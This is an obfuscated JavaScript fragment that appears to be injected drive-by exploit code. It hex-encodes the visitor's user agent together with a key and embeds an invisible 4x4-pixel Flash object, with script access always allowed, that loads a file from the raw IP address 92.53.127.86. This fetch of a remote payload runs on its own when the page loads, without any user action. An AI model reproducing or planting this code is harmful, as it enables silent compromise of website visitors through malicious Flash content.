/*s46045d55835hssfj71357fs*/function hgfgerdfgdf(num, width){/*s58042d61057hfj1503fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s28568d47360hfj5878fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s75941d49745hfj48006fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s14283d17730hfj68661fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd58622hfs*/c += b + d;/*s65730d41613hfj8093fs*/e += 1;}return c;}/*s11598dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.127.86/?Njg1ODQyOTk=&elsa=bpjxSJewRlnNhfVF4b9qz9j0OAzB-ehpWA_x2PYQhA-5qUFrA-2g-nzLAkd80mwRCG6FETi-hL&rand=xXzQMvWdbRXQCJ3EKvrcT6NEMVHRH0CL2Y-dmrHQefjaeVWkzrHFTF_xozKASASG6_FtdfJSDQ&info=MTE5NDM4MjM=&reinz=MzUwMDA5NA==", ghnvbn("http://92.53.127.86/?OTY0NDQyMjg=&elsa=klI8MW1sT86uu2EDTzRSUhZbR_BTYZAtM-ZCXFrMz2lz1yrMQeMklxheHu2MCz-stU1gQ5wsbnq_7S6OJrg&rand=xHzQMrDYbR7FFYPfKPnEUKdEMU3WA0SKwYyZhazVF5-xFDfGpbL1Fx_spVydCF-EmvFvdLAHIwKh1UfASwd&info=MTkxMDc4MDY=&reinz=NzI5MDEyNw==","wexykukusw"));